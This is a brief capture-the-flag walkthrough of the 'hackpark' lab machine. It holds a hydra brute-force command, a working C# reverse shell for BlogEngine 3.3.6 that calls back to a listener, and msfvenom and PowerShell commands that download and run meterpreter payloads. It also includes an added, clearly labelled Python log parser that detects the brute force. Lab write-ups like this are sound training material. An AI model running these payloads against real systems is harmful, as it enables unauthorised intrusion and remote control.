hackpark
Information gathering
Google reverse image search:
The clown is called Pennywise
┌──(zacarx㉿zacarx)-[~]
└─$ nmap -T4 -A 10.10.0.131
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-22 22:30 CST
Nmap scan report for 10.10.0.131
Host is up (0.33s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: hackpark | hackpark amusements
| http-robots.txt: 6 disallowed entries
| /Account/*.* /search /search.aspx /error404.aspx
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: HACKPARK
| NetBIOS_Domain_Name: HACKPARK
| NetBIOS_Computer_Name: HACKPARK
| DNS_Domain_Name: hackpark
| DNS_Computer_Name: hackpark
| Product_Version: 6.3.9600
|_ System_Time: 2022-11-22T14:33:12+00:00
| ssl-cert: Subject: commonName=hackpark
| Not valid before: 2022-11-21T14:27:22
|_Not valid after: 2023-05-23T14:27:22
|_ssl-date: 2022-11-22T14:33:20+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 154.14 seconds
Attack
Brute-force tool (hydra)
Syntax: hydra -l <user> -P <wordlist> <target> http-post-form "<form-spec>"
hydra -l admin -P '/usr/share/wordlists/rockyou.txt' 10.10.0.131 http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=LCLaTYGEYLxbjKKaZYx%2BT%2FOclzbGSOKTFCYmfNf8P0IanNxJxwDsKqJK5nIwt1TynRTD%2FOdM8FL95vDS9avG20JM7VjaSSLtgglOAo%2FHyuC0UO9A%2FacJfC8D%2BVPuDCWt5YdgmZNX5Ri5bHnHwxoeXxdHmo2gRGkvbji1NcKcoxGcn2LZ&__EVENTVALIDATION=0w0yErw7W2ifmWf6d6SF5Nz4ZJGZtbtXnXAR%2BAcDifJTOH%2FUzj0g1jyDAerDFMn24MNE0G8xIsg1UUXykdI9vFuI2728pS0e71r2xbFtk4sQXKWG9r3l%2Fju9cEXoai%2FXDn8F8b6TQ0emte2GLj16enxLcN%2FdSFKn9qJPNElWM%2BPC2Orn&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=%E7%99%BB%E5%BD%95=Log+in:Login failed"
Username: admin
Password: 1qaz2wsx
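As an added defender-side example (not part of the original write-up): a small Python parser over constructed IIS W3C log lines that flags a burst of POSTs to /Account/login.aspx, which is what a hydra run like the one above looks like from the server side. The log lines, client IPs and thresholds are made up for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed IIS W3C log excerpt (sample data, not taken from the original write-up).
# Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = "\n".join(
    ["#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
     "2022-11-22 14:40:00 10.10.0.5 GET /default.aspx - 200",
     "2022-11-22 14:40:03 10.10.0.5 POST /Account/login.aspx ReturnURL=/admin 302"]
    + [f"2022-11-22 14:41:{i:02d} 10.10.0.9 POST /Account/login.aspx ReturnURL=/admin 200"
       for i in range(12)]
)

LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")


def parse_iis(log_text):
    """Yield (timestamp, client_ip, method, uri_stem, status) for each data line."""
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        yield ts, m.group(2), m.group(3), m.group(4), int(m.group(6))


def find_login_bruteforce(log_text, path="/Account/login.aspx", threshold=10, window_seconds=60):
    """Return {client_ip: peak POST count to `path` within any `window_seconds` window}
    for every client whose peak reaches `threshold`. A wordlist attack shows up as a
    burst of POSTs to the login form; the HTTP status is not useful here because
    BlogEngine answers a failed login with 200 and the text "Login failed"."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # ip -> timestamps of POSTs still inside the window
    peak = defaultdict(int)
    for ts, ip, method, stem, _status in parse_iis(log_text):
        if method != "POST" or stem.lower() != path.lower():
            continue
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        peak[ip] = max(peak[ip], len(q))
    return {ip: n for ip, n in peak.items() if n >= threshold}
```

The same sliding-window count works over real IIS logs once the field order in the `#Fields:` header matches the regex.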
After logging in to the admin panel we find:
BlogEngine 3.3.6 has a remote code execution vulnerability.
The principle is simple.
You should be able to work it out yourself, so I won't say more.
<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>
<script runat="server">
    // Shared writer so the output handler can send process output back over the socket.
    static System.IO.StreamWriter streamWriter;

    protected override void OnLoad(EventArgs e) {
        base.OnLoad(e);
        // Listener address and port as given in the write-up.
        using (System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.10.59.85", 4445)) {
            using (System.IO.Stream stream = client.GetStream()) {
                using (System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
                    streamWriter = new System.IO.StreamWriter(stream);
                    StringBuilder strInput = new StringBuilder();
                    System.Diagnostics.Process p = new System.Diagnostics.Process();
                    p.StartInfo.FileName = "cmd.exe";
                    p.StartInfo.CreateNoWindow = true;
                    p.StartInfo.UseShellExecute = false;
                    p.StartInfo.RedirectStandardOutput = true;
                    p.StartInfo.RedirectStandardInput = true;
                    p.StartInfo.RedirectStandardError = true;
                    p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
                    p.Start();
                    p.BeginOutputReadLine();
                    while (true) {
                        strInput.Append(rdr.ReadLine());
                        p.StandardInput.WriteLine(strInput);
                        strInput.Remove(0, strInput.Length);
                    }
                }
            }
        }
    }

    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
        StringBuilder strOutput = new StringBuilder();
        if (!String.IsNullOrEmpty(outLine.Data)) {
            try {
                strOutput.Append(outLine.Data);
                streamWriter.WriteLine(strOutput);
                streamWriter.Flush();
            } catch (Exception err) { }
        }
    }
</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
Payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.17.0.91 LPORT=9898 -e x86/shikata_ga_nai -f exe -o 1.exe
HTTP server
python3 -m http.server 8880
powershell -c wget "http://ip/1.exe"
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.17.0.91 LPORT=900 -f exe -o openme.exe
powershell -c wget "http://10.17.0.91:9988/openme.exe" -outfile "11.exe"
https://github.com/PowerShellMafia/PowerSploit
Look into this one yourselves; I'm too sleepy, good night everyone =-=
PEASS-ng/winPEAS/winPEASbat at master · carlospolop/PEASS-ng · GitHub